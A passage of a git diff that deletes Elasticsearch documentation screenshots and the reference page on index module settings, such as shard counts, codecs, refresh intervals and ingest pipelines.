differ diff --git a/docs/reference/images/service-manager-win.png b/docs/reference/images/service-manager-win.png deleted file mode 100644 index ca58b67d6a2..00000000000 Binary files a/docs/reference/images/service-manager-win.png and /dev/null differ diff --git a/docs/reference/images/sigma.png b/docs/reference/images/sigma.png deleted file mode 100644 index a9f72995e56..00000000000 Binary files a/docs/reference/images/sigma.png and /dev/null differ diff --git a/docs/reference/images/sigma_calc.png b/docs/reference/images/sigma_calc.png deleted file mode 100644 index 9001bbe9eaf..00000000000 Binary files a/docs/reference/images/sigma_calc.png and /dev/null differ diff --git a/docs/reference/images/spatial/error_distance.png b/docs/reference/images/spatial/error_distance.png deleted file mode 100644 index a3274d778c0..00000000000 Binary files a/docs/reference/images/spatial/error_distance.png and /dev/null differ diff --git a/docs/reference/images/spatial/geoshape_grid.png b/docs/reference/images/spatial/geoshape_grid.png deleted file mode 100644 index 6e3fe8e8162..00000000000 Binary files a/docs/reference/images/spatial/geoshape_grid.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbeaver-1-new-conn.png b/docs/reference/images/sql/client-apps/dbeaver-1-new-conn.png deleted file mode 100644 index bf7f1c63135..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbeaver-1-new-conn.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbeaver-2-conn-es.png b/docs/reference/images/sql/client-apps/dbeaver-2-conn-es.png deleted file mode 100644 index f63df0987c1..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbeaver-2-conn-es.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbeaver-3-conn-props.png b/docs/reference/images/sql/client-apps/dbeaver-3-conn-props.png deleted file mode 100644 index 825ce1b6357..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbeaver-3-conn-props.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbeaver-4-driver-ver.png b/docs/reference/images/sql/client-apps/dbeaver-4-driver-ver.png deleted file mode 100644 index bcad2a75d80..00000000000 Binary files 
a/docs/reference/images/sql/client-apps/dbeaver-4-driver-ver.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbeaver-5-test-conn.png b/docs/reference/images/sql/client-apps/dbeaver-5-test-conn.png deleted file mode 100644 index c76ae19937a..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbeaver-5-test-conn.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbeaver-6-data.png b/docs/reference/images/sql/client-apps/dbeaver-6-data.png deleted file mode 100644 index 053042b7911..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbeaver-6-data.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbvis-1-driver-manager.png b/docs/reference/images/sql/client-apps/dbvis-1-driver-manager.png deleted file mode 100644 index d9290e63dea..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbvis-1-driver-manager.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbvis-2-driver.png b/docs/reference/images/sql/client-apps/dbvis-2-driver.png deleted file mode 100644 index a5cbddfefbd..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbvis-2-driver.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbvis-3-add-driver.png b/docs/reference/images/sql/client-apps/dbvis-3-add-driver.png deleted file mode 100644 index bab82fae3f2..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbvis-3-add-driver.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbvis-4-new-conn.png b/docs/reference/images/sql/client-apps/dbvis-4-new-conn.png deleted file mode 100644 index 3001641b531..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbvis-4-new-conn.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbvis-5-conn-props.png b/docs/reference/images/sql/client-apps/dbvis-5-conn-props.png deleted file mode 100644 index e59e8215ec6..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbvis-5-conn-props.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/dbvis-6-data.png b/docs/reference/images/sql/client-apps/dbvis-6-data.png deleted file mode 100644 index 65f8a04eb5d..00000000000 Binary files a/docs/reference/images/sql/client-apps/dbvis-6-data.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/squirell-1-view-drivers.png b/docs/reference/images/sql/client-apps/squirell-1-view-drivers.png deleted file mode 100644 index b5ca1c95126..00000000000 Binary files a/docs/reference/images/sql/client-apps/squirell-1-view-drivers.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/squirell-2-select-driver.png b/docs/reference/images/sql/client-apps/squirell-2-select-driver.png deleted file mode 100644 index 7b55d938ce0..00000000000 Binary files a/docs/reference/images/sql/client-apps/squirell-2-select-driver.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/squirell-3-add-driver.png b/docs/reference/images/sql/client-apps/squirell-3-add-driver.png deleted file mode 100644 index 9b476f2bc19..00000000000 Binary files a/docs/reference/images/sql/client-apps/squirell-3-add-driver.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/squirell-4-driver-list.png b/docs/reference/images/sql/client-apps/squirell-4-driver-list.png deleted file mode 100644 index 990669f8bbf..00000000000 Binary files 
a/docs/reference/images/sql/client-apps/squirell-4-driver-list.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/squirell-5-add-alias.png b/docs/reference/images/sql/client-apps/squirell-5-add-alias.png deleted file mode 100644 index a23e348f45c..00000000000 Binary files a/docs/reference/images/sql/client-apps/squirell-5-add-alias.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/squirell-6-alias-props.png b/docs/reference/images/sql/client-apps/squirell-6-alias-props.png deleted file mode 100644 index a43e5b5be69..00000000000 Binary files a/docs/reference/images/sql/client-apps/squirell-6-alias-props.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/squirell-7-data.png b/docs/reference/images/sql/client-apps/squirell-7-data.png deleted file mode 100644 index ccfcd2593bb..00000000000 Binary files a/docs/reference/images/sql/client-apps/squirell-7-data.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/workbench-1-manage-drivers.png b/docs/reference/images/sql/client-apps/workbench-1-manage-drivers.png deleted file mode 100644 index e305fd2a9dd..00000000000 Binary files a/docs/reference/images/sql/client-apps/workbench-1-manage-drivers.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/workbench-2-select-driver.png b/docs/reference/images/sql/client-apps/workbench-2-select-driver.png deleted file mode 100644 index 94d26b2d2d3..00000000000 Binary files a/docs/reference/images/sql/client-apps/workbench-2-select-driver.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/workbench-3-add-jar.png b/docs/reference/images/sql/client-apps/workbench-3-add-jar.png deleted file mode 100644 index b10aa9ad9f1..00000000000 Binary files a/docs/reference/images/sql/client-apps/workbench-3-add-jar.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/workbench-4-connection.png b/docs/reference/images/sql/client-apps/workbench-4-connection.png deleted file mode 100644 index 9262ef0f533..00000000000 Binary files a/docs/reference/images/sql/client-apps/workbench-4-connection.png and /dev/null differ diff --git a/docs/reference/images/sql/client-apps/workbench-5-data.png b/docs/reference/images/sql/client-apps/workbench-5-data.png deleted file mode 100644 index 7b8251fc958..00000000000 Binary files a/docs/reference/images/sql/client-apps/workbench-5-data.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/administrator_drivers.png b/docs/reference/images/sql/odbc/administrator_drivers.png deleted file mode 100644 index 9f4a26b178f..00000000000 Binary files a/docs/reference/images/sql/odbc/administrator_drivers.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/administrator_launch_editor.png b/docs/reference/images/sql/odbc/administrator_launch_editor.png deleted file mode 100644 index 3bb93af29f9..00000000000 Binary files a/docs/reference/images/sql/odbc/administrator_launch_editor.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/administrator_system_add.png b/docs/reference/images/sql/odbc/administrator_system_add.png deleted file mode 100644 index 64d47b67f81..00000000000 Binary files a/docs/reference/images/sql/odbc/administrator_system_add.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/administrator_system_added.png b/docs/reference/images/sql/odbc/administrator_system_added.png deleted file mode 100644 index 6797264a89e..00000000000 Binary files 
a/docs/reference/images/sql/odbc/administrator_system_added.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/administrator_tracing.png b/docs/reference/images/sql/odbc/administrator_tracing.png deleted file mode 100644 index 14493ba8d5a..00000000000 Binary files a/docs/reference/images/sql/odbc/administrator_tracing.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_excel_cred.png b/docs/reference/images/sql/odbc/apps_excel_cred.png deleted file mode 100644 index a3da36dbf6e..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_excel_cred.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_excel_dsn.png b/docs/reference/images/sql/odbc/apps_excel_dsn.png deleted file mode 100644 index 7e81cc01f12..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_excel_dsn.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_excel_fromodbc.png b/docs/reference/images/sql/odbc/apps_excel_fromodbc.png deleted file mode 100644 index 603af4dfc72..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_excel_fromodbc.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_excel_loaded.png b/docs/reference/images/sql/odbc/apps_excel_loaded.png deleted file mode 100644 index 7d7ea86c8cc..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_excel_loaded.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_excel_picktable.png b/docs/reference/images/sql/odbc/apps_excel_picktable.png deleted file mode 100644 index fd7aecc4128..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_excel_picktable.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_databases.png b/docs/reference/images/sql/odbc/apps_microstrat_databases.png deleted file mode 100644 index 9f1c69b7968..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_databases.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_dsn.png b/docs/reference/images/sql/odbc/apps_microstrat_dsn.png deleted file mode 100644 index 4fa4c90947f..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_dsn.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_inmem.png b/docs/reference/images/sql/odbc/apps_microstrat_inmem.png deleted file mode 100644 index 3e97c031115..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_inmem.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_live.png b/docs/reference/images/sql/odbc/apps_microstrat_live.png deleted file mode 100644 index 2a3e0fa02a3..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_live.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_loadtable.png b/docs/reference/images/sql/odbc/apps_microstrat_loadtable.png deleted file mode 100644 index a1502c4e9f3..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_loadtable.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_newdata.png b/docs/reference/images/sql/odbc/apps_microstrat_newdata.png deleted file mode 100644 index 3a00c6dffe2..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_newdata.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_newdossier.png b/docs/reference/images/sql/odbc/apps_microstrat_newdossier.png deleted file mode 100644 index 
275588a7fe0..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_newdossier.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_newds.png b/docs/reference/images/sql/odbc/apps_microstrat_newds.png deleted file mode 100644 index 45e3666eae6..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_newds.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_tables.png b/docs/reference/images/sql/odbc/apps_microstrat_tables.png deleted file mode 100644 index 71283d05e5c..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_tables.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_microstrat_visualize.png b/docs/reference/images/sql/odbc/apps_microstrat_visualize.png deleted file mode 100644 index 3e15946f0f1..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_microstrat_visualize.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_pbi_dsn.png b/docs/reference/images/sql/odbc/apps_pbi_dsn.png deleted file mode 100644 index 9e9512ec40f..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_pbi_dsn.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_pbi_fromodbc1.png b/docs/reference/images/sql/odbc/apps_pbi_fromodbc1.png deleted file mode 100644 index 313b1edbc74..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_pbi_fromodbc1.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_pbi_fromodbc2.png b/docs/reference/images/sql/odbc/apps_pbi_fromodbc2.png deleted file mode 100644 index fade98f4ad5..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_pbi_fromodbc2.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_pbi_loaded.png b/docs/reference/images/sql/odbc/apps_pbi_loaded.png deleted file mode 100644 index c1927d2200c..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_pbi_loaded.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_pbi_picktable.png b/docs/reference/images/sql/odbc/apps_pbi_picktable.png deleted file mode 100644 index 2b2e1c8e4e5..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_pbi_picktable.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_ps_exed.png b/docs/reference/images/sql/odbc/apps_ps_exed.png deleted file mode 100644 index 84c3c12ec48..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_ps_exed.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_qlik_adddata.png b/docs/reference/images/sql/odbc/apps_qlik_adddata.png deleted file mode 100644 index b32596c1c01..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_qlik_adddata.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_qlik_create.png b/docs/reference/images/sql/odbc/apps_qlik_create.png deleted file mode 100644 index 4a2438c1cfa..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_qlik_create.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_qlik_dsn.png b/docs/reference/images/sql/odbc/apps_qlik_dsn.png deleted file mode 100644 index 79852e50168..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_qlik_dsn.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_qlik_newapp.png b/docs/reference/images/sql/odbc/apps_qlik_newapp.png deleted file mode 100644 index 1909707825a..00000000000 Binary files 
a/docs/reference/images/sql/odbc/apps_qlik_newapp.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_qlik_odbc.png b/docs/reference/images/sql/odbc/apps_qlik_odbc.png deleted file mode 100644 index 9b56fe6bcbe..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_qlik_odbc.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_qlik_open.png b/docs/reference/images/sql/odbc/apps_qlik_open.png deleted file mode 100644 index f4e33230ecc..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_qlik_open.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_qlik_selecttable.png b/docs/reference/images/sql/odbc/apps_qlik_selecttable.png deleted file mode 100644 index c6a485cb85c..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_qlik_selecttable.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_qlik_visualize.png b/docs/reference/images/sql/odbc/apps_qlik_visualize.png deleted file mode 100644 index c87cd505de3..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_qlik_visualize.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_tableau_connd.png b/docs/reference/images/sql/odbc/apps_tableau_connd.png deleted file mode 100644 index ae34f673aa3..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_tableau_connd.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_tableau_fromodbc.png b/docs/reference/images/sql/odbc/apps_tableau_fromodbc.png deleted file mode 100644 index 717c5e4a886..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_tableau_fromodbc.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/apps_tableau_loaded.png b/docs/reference/images/sql/odbc/apps_tableau_loaded.png deleted file mode 100644 index 61e80be627f..00000000000 Binary files a/docs/reference/images/sql/odbc/apps_tableau_loaded.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/dsn_editor_basic.png b/docs/reference/images/sql/odbc/dsn_editor_basic.png deleted file mode 100644 index 78c042fd751..00000000000 Binary files a/docs/reference/images/sql/odbc/dsn_editor_basic.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/dsn_editor_conntest.png b/docs/reference/images/sql/odbc/dsn_editor_conntest.png deleted file mode 100644 index 9b1bdb7bc25..00000000000 Binary files a/docs/reference/images/sql/odbc/dsn_editor_conntest.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/dsn_editor_logging.png b/docs/reference/images/sql/odbc/dsn_editor_logging.png deleted file mode 100644 index 42a7d59342b..00000000000 Binary files a/docs/reference/images/sql/odbc/dsn_editor_logging.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/dsn_editor_misc.png b/docs/reference/images/sql/odbc/dsn_editor_misc.png deleted file mode 100644 index 6638aaa3add..00000000000 Binary files a/docs/reference/images/sql/odbc/dsn_editor_misc.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/dsn_editor_security.png b/docs/reference/images/sql/odbc/dsn_editor_security.png deleted file mode 100644 index 33bac80aff7..00000000000 Binary files a/docs/reference/images/sql/odbc/dsn_editor_security.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/dsn_editor_security_cert.png b/docs/reference/images/sql/odbc/dsn_editor_security_cert.png deleted file mode 100644 index c37c03c6cbc..00000000000 Binary files 
a/docs/reference/images/sql/odbc/dsn_editor_security_cert.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/env_var_log.png b/docs/reference/images/sql/odbc/env_var_log.png deleted file mode 100644 index 739f9650d95..00000000000 Binary files a/docs/reference/images/sql/odbc/env_var_log.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/installer_accept_license.png b/docs/reference/images/sql/odbc/installer_accept_license.png deleted file mode 100644 index 4fc51d1373c..00000000000 Binary files a/docs/reference/images/sql/odbc/installer_accept_license.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/installer_choose_destination.png b/docs/reference/images/sql/odbc/installer_choose_destination.png deleted file mode 100644 index 12419b180d9..00000000000 Binary files a/docs/reference/images/sql/odbc/installer_choose_destination.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/installer_finish.png b/docs/reference/images/sql/odbc/installer_finish.png deleted file mode 100644 index a7ec3606dc2..00000000000 Binary files a/docs/reference/images/sql/odbc/installer_finish.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/installer_installing.png b/docs/reference/images/sql/odbc/installer_installing.png deleted file mode 100644 index 21bec24b1bc..00000000000 Binary files a/docs/reference/images/sql/odbc/installer_installing.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/installer_preparing.png b/docs/reference/images/sql/odbc/installer_preparing.png deleted file mode 100644 index 4bb21854874..00000000000 Binary files a/docs/reference/images/sql/odbc/installer_preparing.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/installer_ready_install.png b/docs/reference/images/sql/odbc/installer_ready_install.png deleted file mode 100644 index 9ad0e52abb4..00000000000 Binary files a/docs/reference/images/sql/odbc/installer_ready_install.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/installer_started.png b/docs/reference/images/sql/odbc/installer_started.png deleted file mode 100644 index e713594e3cc..00000000000 Binary files a/docs/reference/images/sql/odbc/installer_started.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/launch_administrator.png b/docs/reference/images/sql/odbc/launch_administrator.png deleted file mode 100644 index f7cc37120d7..00000000000 Binary files a/docs/reference/images/sql/odbc/launch_administrator.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/msi_icon.png b/docs/reference/images/sql/odbc/msi_icon.png deleted file mode 100644 index a45bfa28d0e..00000000000 Binary files a/docs/reference/images/sql/odbc/msi_icon.png and /dev/null differ diff --git a/docs/reference/images/sql/odbc/uninstall.png b/docs/reference/images/sql/odbc/uninstall.png deleted file mode 100644 index 5bd2ccb7fde..00000000000 Binary files a/docs/reference/images/sql/odbc/uninstall.png and /dev/null differ diff --git a/docs/reference/images/sql/rest/console-triple-quotes.png b/docs/reference/images/sql/rest/console-triple-quotes.png deleted file mode 100644 index 4a13acb9861..00000000000 Binary files a/docs/reference/images/sql/rest/console-triple-quotes.png and /dev/null differ diff --git a/docs/reference/index-modules.asciidoc b/docs/reference/index-modules.asciidoc deleted file mode 100644 index 6af6118663b..00000000000 --- a/docs/reference/index-modules.asciidoc +++ /dev/null @@ -1,357 +0,0 @@ - -[[index-modules]] 
-= Index modules - -[partintro] --- - -Index Modules are modules created per index and control all aspects related to -an index. - -[discrete] -[[index-modules-settings]] -== Index Settings - -[[index-modules-settings-description]] -// tag::index-modules-settings-description-tag[] -Index level settings can be set per-index. Settings may be: - -_static_:: - -They can only be set at index creation time or on a -<>. - -_dynamic_:: - -They can be changed on a live index using the -<> API. -// end::index-modules-settings-description-tag[] - -WARNING: Changing static or dynamic index settings on a closed index could -result in incorrect settings that are impossible to rectify without deleting -and recreating the index. - -[discrete] -=== Static index settings - -Below is a list of all _static_ index settings that are not associated with any -specific index module: - -[[index-number-of-shards]] -// tag::index-number-of-shards-tag[] -`index.number_of_shards` {ess-icon}:: -The number of primary shards that an index should have. Defaults to `1`. This setting can only be set at index creation time. It cannot be changed on a closed index. -+ -NOTE: The number of shards are limited to `1024` per index. This limitation is a safety limit to prevent accidental creation of indices that can destabilize a cluster due to resource allocation. The limit can be modified by specifying `export ES_JAVA_OPTS="-Des.index.max_number_of_shards=128"` system property on every node that is part of the cluster. - -// end::index-number-of-shards-tag[] - -[[index-number-of-routing-shards]] -`index.number_of_routing_shards`:: -+ -==== -Number of routing shards used to <> an index. - -For example, a 5 shard index with `number_of_routing_shards` set to `30` (`5 x -2 x 3`) could be split by a factor of `2` or `3`. In other words, it could be -split as follows: - -* `5` -> `10` -> `30` (split by 2, then by 3) -* `5` -> `15` -> `30` (split by 3, then by 2) -* `5` -> `30` (split by 6) - -This setting's default value depends on the number of primary shards in the -index. The default is designed to allow you to split by factors of 2 up -to a maximum of 1024 shards. -==== - -`index.shard.check_on_startup`:: - -Whether or not shards should be checked for corruption before opening. When -corruption is detected, it will prevent the shard from being opened. -Accepts: -`false`::: (default) Don't check for corruption when opening a shard. -`checksum`::: Check for physical corruption. -`true`::: Check for both physical and logical corruption. This is much more -expensive in terms of CPU and memory usage. -+ -WARNING: Expert only. Checking shards may take a lot of time on large -indices. - -[[index-codec]] `index.codec`:: - - The +default+ value compresses stored data with LZ4 - compression, but this can be set to +best_compression+ - which uses {wikipedia}/DEFLATE[DEFLATE] for a higher - compression ratio, at the expense of slower stored fields performance. - If you are updating the compression type, the new one will be applied - after segments are merged. Segment merging can be forced using - <>. - -[[routing-partition-size]] `index.routing_partition_size`:: - - The number of shards a custom <> value can go to. - Defaults to 1 and can only be set at index creation time. This value must be less - than the `index.number_of_shards` unless the `index.number_of_shards` value is also 1. - See <> for more details about how this setting is used. 
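For illustration, here is a minimal sketch of how static settings such as
`index.number_of_shards` and `index.codec` (both described above) might be
supplied at index creation time; the index name and values are made up for
this example:

[source,console]
------------------------------
PUT my-index
{
  "settings": {
    "index.number_of_shards": 3,
    "index.codec": "best_compression"
  }
}
------------------------------

Because both settings are static, they cannot be updated on a live index afterwards.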
- -[[ccr-index-soft-deletes]] -// tag::ccr-index-soft-deletes-tag[] -`index.soft_deletes.enabled`:: -deprecated:[7.6.0, Creating indices with soft-deletes disabled is deprecated and will be removed in future Elasticsearch versions.] -Indicates whether soft deletes are enabled on the index. Soft deletes can only -be configured at index creation and only on indices created on or after -{es} 6.5.0. Defaults to `true`. -// end::ccr-index-soft-deletes-tag[] - -[[ccr-index-soft-deletes-retention-period]] -//tag::ccr-index-soft-deletes-retention-tag[] -`index.soft_deletes.retention_lease.period`:: -The maximum period to retain a shard history retention lease before it is -considered expired. Shard history retention leases ensure that soft deletes are -retained during merges on the Lucene index. If a soft delete is merged away -before it can be replicated to a follower the following process will fail due -to incomplete history on the leader. Defaults to `12h`. -//end::ccr-index-soft-deletes-retention-tag[] - -[[load-fixed-bitset-filters-eagerly]] `index.load_fixed_bitset_filters_eagerly`:: - - Indicates whether <> are pre-loaded for - nested queries. Possible values are `true` (default) and `false`. - -[[index-hidden]] `index.hidden`:: - - Indicates whether the index should be hidden by default. Hidden indices are not - returned by default when using a wildcard expression. This behavior is controlled - per request through the use of the `expand_wildcards` parameter. Possible values are - `true` and `false` (default). - -[discrete] -[[dynamic-index-settings]] -=== Dynamic index settings - -Below is a list of all _dynamic_ index settings that are not associated with any -specific index module: - -[[dynamic-index-number-of-replicas]] -`index.number_of_replicas`:: - - The number of replicas each primary shard has. Defaults to 1. - -`index.auto_expand_replicas`:: - - Auto-expand the number of replicas based on the number of data nodes in the cluster. - Set to a dash delimited lower and upper bound (e.g. `0-5`) or use `all` - for the upper bound (e.g. `0-all`). Defaults to `false` (i.e. disabled). - Note that the auto-expanded number of replicas only takes - <> rules into account, but ignores - any other allocation rules such as <> - and <>, and this can lead to the - cluster health becoming `YELLOW` if the applicable rules prevent all the replicas - from being allocated. - -`index.search.idle.after`:: - How long a shard can not receive a search or get request until it's considered - search idle. (default is `30s`) - -[[index-refresh-interval-setting]] -`index.refresh_interval`:: - - How often to perform a refresh operation, which makes recent changes to the - index visible to search. Defaults to `1s`. Can be set to `-1` to disable - refresh. If this setting is not explicitly set, shards that haven't seen - search traffic for at least `index.search.idle.after` seconds will not receive - background refreshes until they receive a search request. Searches that hit an - idle shard where a refresh is pending will wait for the next background - refresh (within `1s`). This behavior aims to automatically optimize bulk - indexing in the default case when no searches are performed. In order to opt - out of this behavior an explicit value of `1s` should set as the refresh - interval. - -[[index-max-result-window]] -`index.max_result_window`:: - - The maximum value of `from + size` for searches to this index. Defaults to - `10000`. 
Search requests take heap memory and time proportional to - `from + size` and this limits that memory. See - <> or <> for a more efficient alternative - to raising this. - -`index.max_inner_result_window`:: - - The maximum value of `from + size` for inner hits definition and top hits aggregations to this index. Defaults to - `100`. Inner hits and top hits aggregation take heap memory and time proportional to `from + size` and this limits that memory. - -`index.max_rescore_window`:: - - The maximum value of `window_size` for `rescore` requests in searches of this index. - Defaults to `index.max_result_window` which defaults to `10000`. Search - requests take heap memory and time proportional to - `max(window_size, from + size)` and this limits that memory. - -`index.max_docvalue_fields_search`:: - - The maximum number of `docvalue_fields` that are allowed in a query. - Defaults to `100`. Doc-value fields are costly since they might incur - a per-field per-document seek. - -`index.max_script_fields`:: - - The maximum number of `script_fields` that are allowed in a query. - Defaults to `32`. - -[[index-max-ngram-diff]] -`index.max_ngram_diff`:: - - The maximum allowed difference between min_gram and max_gram for NGramTokenizer and NGramTokenFilter. - Defaults to `1`. - -[[index-max-shingle-diff]] -`index.max_shingle_diff`:: - - The maximum allowed difference between max_shingle_size and min_shingle_size - for the <>. Defaults to - `3`. - -`index.max_refresh_listeners`:: - - Maximum number of refresh listeners available on each shard of the index. - These listeners are used to implement <>. - - `index.analyze.max_token_count`:: - - The maximum number of tokens that can be produced using _analyze API. - Defaults to `10000`. - - `index.highlight.max_analyzed_offset`:: - - The maximum number of characters that will be analyzed for a highlight request. - This setting is only applicable when highlighting is requested on a text that was indexed without offsets or term vectors. - Defaults to `1000000`. - -[[index-max-terms-count]] - `index.max_terms_count`:: - - The maximum number of terms that can be used in Terms Query. - Defaults to `65536`. - -[[index-max-regex-length]] - `index.max_regex_length`:: - - The maximum length of regex that can be used in Regexp Query. - Defaults to `1000`. - - `index.routing.allocation.enable`:: - - Controls shard allocation for this index. It can be set to: - * `all` (default) - Allows shard allocation for all shards. - * `primaries` - Allows shard allocation only for primary shards. - * `new_primaries` - Allows shard allocation only for newly-created primary shards. - * `none` - No shard allocation is allowed. - - `index.routing.rebalance.enable`:: - - Enables shard rebalancing for this index. It can be set to: - * `all` (default) - Allows shard rebalancing for all shards. - * `primaries` - Allows shard rebalancing only for primary shards. - * `replicas` - Allows shard rebalancing only for replica shards. - * `none` - No shard rebalancing is allowed. - - `index.gc_deletes`:: - - The length of time that a <> remains available for <>. - Defaults to `60s`. - - `index.default_pipeline`:: - - The default <> pipeline for this index. Index requests will fail - if the default pipeline is set and the pipeline does not exist. The default may be - overridden using the `pipeline` parameter. The special pipeline name `_none` indicates - no ingest pipeline should be run. - - `index.final_pipeline`:: - The final <> pipeline for this index. 
Index requests - will fail if the final pipeline is set and the pipeline does not exist. - The final pipeline always runs after the request pipeline (if specified) and - the default pipeline (if it exists). The special pipeline name `_none` - indicates no ingest pipeline will run. - -[discrete] -=== Settings in other index modules - -Other index settings are available in index modules: - -<>:: - - Settings to define analyzers, tokenizers, token filters and character - filters. - -<>:: - - Control over where, when, and how shards are allocated to nodes. - -<>:: - - Enable or disable dynamic mapping for an index. - -<>:: - - Control over how shards are merged by the background merge process. - -<>:: - - Configure custom similarity settings to customize how search results are - scored. - -<>:: - - Control over how slow queries and fetch requests are logged. - -<>:: - - Configure the type of filesystem used to access shard data. - -<>:: - - Control over the transaction log and background flush operations. - -<>:: - - Control over the retention of a history of operations in the index. - -<>:: - - Configure indexing back pressure limits. - -[discrete] 